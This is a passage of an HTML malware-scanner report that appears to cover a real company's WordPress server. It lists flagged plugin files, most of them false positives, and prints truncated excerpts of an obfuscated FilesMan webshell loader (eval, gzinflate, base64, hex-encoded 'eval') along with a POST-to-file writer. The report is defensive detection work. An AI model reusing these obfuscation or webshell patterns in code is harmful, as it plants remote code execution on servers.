#007700">(</span><span style="color: #0000BB">$tables</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">$tblFilterCount&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">$tblAllCount&nbsp;</span><span style="color: #007700">-&nbsp;</span><span style="color: #0000BB">$tblCreateCount</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">DUP_Log</span><span style="color: #007700">::</span><span style="color: #0000BB">Info</span><span style="color: #007700">(</span><span style="color: #DD0000">"FILTERED:&nbsp;[</span><span style="color: #007700">{</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">FilterTables</span><span style="color: #007700">}</span><span style="color: #DD0000">]"</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">DUP_Log</span><span style="color: #007700">::</span><span style="color: #0000BB">Info</span><span style="color: #007700">(</span><span style="color: #DD0000">"RESPONSE:&nbsp;</span><span style="color: #007700">{</span><span style="color: #0000BB">$output</span><span style="color: #007700">}</span><span style="color: #DD0000">"</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">DUP_Log</span><span style="color: #007700">::</span><span style="color: #0000BB">Info</span><span style="color: #007700">(</span><span style="color: #DD0000">"TABLES:&nbsp;total:</span><span style="color: #007700">{</span><span style="color: #0000BB">$tblAllCount</span><span style="color: #007700">}</span><span style="color: #DD0000">&nbsp;|&nbsp;filtered:</span><span style="color: #007700">{</span><span style="color: #0000BB">$tblFilterCount</span><span style="color: #007700">}</span><span style="color: #DD0000">&nbsp;|&nbsp;create:</span><span style="color: #007700">{</span><span style="color: #0000BB">$tblCreateCount</span><span style="color: #007700">}</span><span style="color: #DD0000">"</span><span style="color: #007700">);&nbsp;}&nbsp;</span><span style="color: #0000BB">$sql_footer&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">"\n\n/*&nbsp;Du...</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_62").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/liko-holding.com.ua/wp-content/plugins/duplicator/classes/class.db.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 6.39 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:28</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:27</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span><br><table id="file_63" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function exec <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `exec`</p><p><i>[<a href="https://www.php.net/exec" target="_blank" class="text-primary">https://www.php.net/exec</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">exec</span><span style="color: #007700">(</span><span style="color: #0000BB">$cmd</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$out</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$rc</span><span style="color: #007700">);&nbsp;if&nbsp;(</span><span style="color: #0000BB">$rc&nbsp;</span><span style="color: #007700">===&nbsp;</span><span style="color: #0000BB">0</span><span style="color: #007700">)&nbsp;{&nbsp;return&nbsp;</span><span style="color: #0000BB">$path</span><span style="color: #007700">;&nbsp;}&nbsp;}&nbsp;}&nbsp;return&nbsp;</span><span style="color: #0000BB">false</span><span style="color: #007700">;&nbsp;}&nbsp;public&nbsp;static&nbsp;function&nbsp;</span><span style="color: #0000BB">getTableCollationList</span><span style="color: #007700">(</span><span style="color: #0000BB">$excludeTables</span><span style="color: #007700">)&nbsp;{&nbsp;global&nbsp;</span><span style="color: #0000BB">$wpdb</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">$collations&nbsp;</span><span style="color: #007700">=&nbsp;array();&nbsp;try&nbsp;{&nbsp;</span><span style="color: #0000BB">$query&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">$wpdb</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">get_results</span><span style="color: #007700">(</span><span style="color: #DD0000">"SHOW&nbsp;TABLE&nbsp;STATUS&nbsp;FROM&nbsp;`</span><span style="color: #007700">{</span><span style="color: #0000BB">$wpdb</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">dbname</span><span style="color: #007700">}</span><span style="color: #DD0000">`"</span><span style="color: #007700">);&nbsp;foreach(</span><span style="color: #0000BB">$query&nbsp;</span><span style="color: #007700">as&nbsp;</span><span style="color: #0000BB">$key&nbsp;</span><span style="color: #007700">=&gt;&nbsp;</span><span style="color: #0000BB">$row</span><span style="color: #007700">)&nbsp;{&nbsp;if&nbsp;(!&nbsp;</span><span style="color: #0000BB">in_array</span><span style="color: #007700">(</span><span style="color: #0000BB">$row</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">Name</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$excludeTables</span><span style="color: #007700">))&nbsp;{&nbsp;if&nbsp;(!&nbsp;empty(</span><span style="color: #0000BB">$row</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">Collation</span><span style="color: #007700">))&nbsp;</span><span style="color: #0000BB">$collations</span><span style="color: #007700">[]&nbsp;=&nbsp;</span><span style="color: #0000BB">$row</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">Collation</span><span style="color: #007700">;&nbsp;}&nbsp;}&nbsp;</span><span style="color: #0000BB">$collations&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">array_unique</span><span style="color: #007700">(</span><span style="color: #0000BB">$collations</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">SORT_STRING</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">$collations&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">array_values</span><span style="color: #007700">(</span><span style="color: #0000BB">$collations</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">ret</span><span style="color: #007700">...</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_63").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/liko-holding.com.ua/wp-content/plugins/download-manager/list-files.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 11.63 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:28</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:26</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_64" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Sign 43b0d90f <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 74</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 43b0d90f)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">echo&nbsp;</span><span style="color: #0000BB">$_GET</span><span style="color: #007700">[</span><span style="color: #DD0000">'paged'</span><span style="color: #007700">]?</span><span style="color: #0000BB">$_GET</span><span style="color: #007700">[</span><span style="color: #DD0000">'paged'</span><span style="color: #007700">]</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_64").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/liko-holding.com.ua/wp-content/plugins/download-manager/functions.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 67.33 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:28</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:26</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span><br><table id="file_65" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit concat_vars_with_spaces <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 873</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Concatenation of vars technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$cimg&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">$desc&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">$toolbar&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">$subcats&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">$html&nbsp;&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">$pgn&nbsp;</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_65").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/liko-holding.com.ua/wp-content/plugins/download-manager/wpdm-widgets.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 14.24 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:28</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:26</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span><br><table id="file_66" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function create_function <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `create_function`</p><p><i>[<a href="https://www.php.net/create_function" target="_blank" class="text-primary">https://www.php.net/create_function</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">create_function</span><span style="color: #007700">(</span><span style="color: #DD0000">''</span><span style="color: #007700">,&nbsp;</span><span style="color: #DD0000">'return&nbsp;register_widget("wpdm_topdls_widget");'</span><span style="color: #007700">));&nbsp;</span><span style="color: #0000BB">add_action</span><span style="color: #007700">(</span><span style="color: #DD0000">'widgets_init'</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">create_function</span><span style="color: #007700">(</span><span style="color: #DD0000">''</span><span style="color: #007700">,&nbsp;</span><span style="color: #DD0000">'return&nbsp;register_widget("wpdm_newpacks_widget");'</span><span style="color: #007700">));&nbsp;</span><span style="color: #0000BB">add_action</span><span style="color: #007700">(</span><span style="color: #DD0000">'widgets_init'</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">create_function</span><span style="color: #007700">(</span><span style="color: #DD0000">''</span><span style="color: #007700">,&nbsp;</span><span style="color: #DD0000">'return&nbsp;register_widget("wpdm_affiliate_widget");'</span><span style="color: #007700">));&nbsp;</span><span style="color: #0000BB">add_action</span><span style="color: #007700">(</span><span style="color: #DD0000">'widgets_init'</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">create_function</span><span style="color: #007700">(</span><span style="color: #DD0000">''</span><span style="color: #007700">,&nbsp;</span><span style="color: #DD0000">'return&nbsp;register_widget("wpdm_search_widget");'</span><span style="color: #007700">))</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_66").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/old.liko-holding.com.ua/temp/admin/js/ckfinder/plugins/fileeditor/plugin.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 3.48 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:01</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:44</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_67" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit download_remote_code2 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 75</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">fwrite</span><span style="color: #007700">(</span><span style="color: #0000BB">$fp</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">"content"</span><span style="color: #007700">])</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_67").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/old.liko-holding.com.ua/temp/ckfinder/plugins/fileeditor/plugin.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 3.48 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:02</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:44</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_68" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit download_remote_code2 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 75</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">fwrite</span><span style="color: #007700">(</span><span style="color: #0000BB">$fp</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">"content"</span><span style="color: #007700">])</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_68").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/old.liko-holding.com.ua/new/admin/js/ckfinder/plugins/fileeditor/plugin.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 3.48 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:05:48</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:41</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_69" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit download_remote_code2 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 75</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">fwrite</span><span style="color: #007700">(</span><span style="color: #0000BB">$fp</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">"content"</span><span style="color: #007700">])</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_69").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/old.liko-holding.com.ua/new/ckfinder/plugins/fileeditor/plugin.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 3.48 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:05:49</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:41</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_70" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit download_remote_code2 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 75</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">fwrite</span><span style="color: #007700">(</span><span style="color: #0000BB">$fp</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">"content"</span><span style="color: #007700">])</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_70").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/old.liko-holding.com.ua/cache/contacts.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 12.51 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:05:50</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:34</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_71" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit execution <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 175</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP</p><p><i>[<a href="https://cwe.mitre.org/data/definitions/77.html" target="_blank" class="text-primary">https://cwe.mitre.org/data/definitions/77.html</a>, <a href=" https://cwe.mitre.org/data/definitions/78.html" target="_blank" class="text-primary"> https://cwe.mitre.org/data/definitions/78.html</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">include(</span><span style="color: #0000BB">$_SERVER</span><span style="color: #007700">[</span><span style="color: #0000BB">DOCUMENT_ROOT</span><span style="color: #007700">].</span><span style="color: #DD0000">"/modules/auth/antispamimg.php"</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_71").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/old.liko-holding.com.ua/modules/pages/upload/image/db.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 22.72 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:05:56</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:41</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 13</span><br><table id="file_72" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'7b1tVxs50jD8OXvO9R9Er3fanhhjm2Q2Y7ADIZCQSSAD5GUC3N623bZ7aLs93W0Mk+W/31Wll5b6xZhkdq/7OedhJtDdKpVKUkkqlapK3rDM1tzJLL4tl7qn+ycf90/O7ddnZ++7H+Ctu/tq/+jMvqywCvv6P39j8FOaR264O3KnccTazAlD57ZsvQqCke9aVWad+vNwhg/vTo9eBDE+eU7XCftj79oN8fU3Zzpwb/DpxJn0fPhY2eKoh0HoOv1xWS/CiVjJwccKh8EfD2iO4nAWRMtorsqMbK3dZkPHj9ykFvJn7DoDNyxT7o1Grc6e1J+woyBmB8F8OrAlZfLHvfFi7dPd//wN/t+J3Cjygmk3ip0wLmOeHTcMg7AburMgjL3pqFynr97U60ZuXLZ5sh+M7OrRh7dvzUT43CWAyK6m8k2cm6574/bnMZYXexNXgkAyvXd9b+LF5eTjxBl5/e4f8yB2o244nyKQSB64Q2/qlm1ov9P...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit eval_preg <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution), through PCRE (Perl compatible Regular Expression), allow remote attackers to execute arbitrary commands or code on the target machine</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">preg_replace</span><span style="color: #007700">(</span><span style="color: #DD0000">"/.*/e"</span><span style="color: #007700">,</span><span style="color: #DD0000">"eval(gzinflate(base64_decode('7b1tVxs50jD8OXvO9R9Er3fanhhjm2Q2Y7ADIZCQSSAD5GUC3N623bZ7aLs93W0Mk+W/31Wll5b6xZhkdq/7OedhJtDdKpVKUkkqlapK3rDM1tzJLL4tl7qn+ycf90/O7ddnZ++7H+Ctu/tq/+jMvqywCvv6P39j8FOaR264O3KnccTazAlD57ZsvQqCke9aVWad+vNwhg/vTo9eBDE+eU7XCftj79oN8fU3Zzpwb/DpxJn0fPhY2eKoh0HoOv1xWS/CiVjJwccKh8EfD2iO4nAWRMtorsqMbK3dZkPHj9ykFvJn7DoDNyxT7o1Grc6e1J+woyBmB8F8OrAlZfLHvfFi7dPd//wN/t+J3Cjygmk3ip0wLmOeHTcMg7AburMgjL3pqFynr97U60ZuXLZ5sh+M7OrRh7dvzUT43CWAyK6m8k2cm6574/bnMZYXexNX...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit eval_preg <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution), through PCRE (Perl compatible Regular Expression), allow remote attackers to execute arbitrary commands or code on the target machine</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">preg_replace</span><span style="color: #007700">(</span><span style="color: #DD0000">"/.*/e"</span><span style="color: #007700">,</span><span style="color: #DD0000">"\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'7b1tVxs50jD8OXvO9R9Er3fanhhjm2Q2Y7ADIZCQSSAD5GUC3N623bZ7aLs93W0Mk+W/31Wll5b6xZhkdq/7OedhJtDdKpVKUkkqlapK3rDM1tzJLL4tl7qn+ycf90/O7ddnZ++7H+Ctu/tq/+jMvqywCvv6P39j8FOaR264O3KnccTazAlD57ZsvQqCke9aVWad+vNwhg/vTo9eBDE+eU7XCftj79oN8fU3Zzpwb/DpxJn0fPhY2eKoh0HoOv1xWS/CiVjJwccKh8EfD2iO4nAWRMtorsqMbK3dZkPHj9ykFvJn7DoDNyxT7o1Grc6e1J+woyBmB8F8OrAlZfLHvfFi7dPd//wN/t+J3Cjyg...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit execution <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP</p><p><i>[<a href="https://cwe.mitre.org/data/definitions/77.html" target="_blank" class="text-primary">https://cwe.mitre.org/data/definitions/77.html</a>, <a href=" https://cwe.mitre.org/data/definitions/78.html" target="_blank" class="text-primary"> https://cwe.mitre.org/data/definitions/78.html</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">gzinflate</span><span style="color: #007700">(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'7b1tVxs50jD8OXvO9R9Er3fanhhjm2Q2Y7ADIZCQSSAD5GUC3N623bZ7aLs93W0Mk+W/31Wll5b6xZhkdq/7OedhJtDdKpVKUkkqlapK3rDM1tzJLL4tl7qn+ycf90/O7ddnZ++7H+Ctu/tq/+jMvqywCvv6P39j8FOaR264O3KnccTazAlD57ZsvQqCke9aVWad+vNwhg/vTo9eBDE+eU7XCftj79oN8fU3Zzpwb/DpxJn0fPhY2eKoh0HoOv1xWS/CiVjJwccKh8EfD2iO4nAWRMtorsqMbK3dZkPHj9ykFvJn7DoDNyxT7o1Grc6e1J+woyBmB8F8OrAlZfLHvfFi7dPd//wN/t+J3Cjygmk3ip0wLmOeHTcMg7AburMgjL3pqFynr97U60ZuXLZ5sh+M7OrRh7dvzUT43CWAyK6m8k2cm6574/bnMZYXexNXgkAyvXd9b+LF5eTjxBl5/e...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit hex_char <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Hex char is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">\</span><span style="color: #0000BB">x5F</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Encoded Function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">gzinflate</span><span style="color: #007700">(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'7b1tVxs50jD8OXvO9R9Er3fanhhjm2Q2Y7ADIZCQSSAD5GUC3N623bZ7aLs93W0Mk+W/31Wll5b6xZhkdq/7OedhJtDdKpVKUkkqlapK3rDM1tzJLL4tl7qn+ycf90/O7ddnZ++7H+Ctu/tq/+jMvqywCvv6P39j8FOaR264O3KnccTazAlD57ZsvQqCke9aVWad+vNwhg/vTo9eBDE+eU7XCftj79oN8fU3Zzpwb/DpxJn0fPhY2eKoh0HoOv1xWS/CiVjJwccKh8EfD2iO4nAWRMtorsqMbK3dZkPHj9ykFvJn7DoDNyxT7o1Grc6e1J+woyBmB8F8OrAlZfLHvfFi7dPd//wN/t+J3Cjygmk3ip0wLmOeHTcMg7AburMgjL3pqFynr97U60ZuXLZ5sh+M7OrRh7dvzUT43CWAyK6m8k2cm6574/bnMZYXexNXgkAyvXd9b+LF5eTjxBl5/e...</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 237750ea <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 237750ea)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">\</span><span style="color: #0000BB">x65</span><span style="color: #007700">\</span><span style="color: #0000BB">x76</span><span style="color: #007700">\</span><span style="color: #0000BB">x61</span><span style="color: #007700">\</span><span style="color: #0000BB">x6C</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 34b7e999 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 34b7e999)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">default_action&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">"FilesMan</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 39ce8596 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 39ce8596)</p></td><td><code><code><span style="color: #000000">
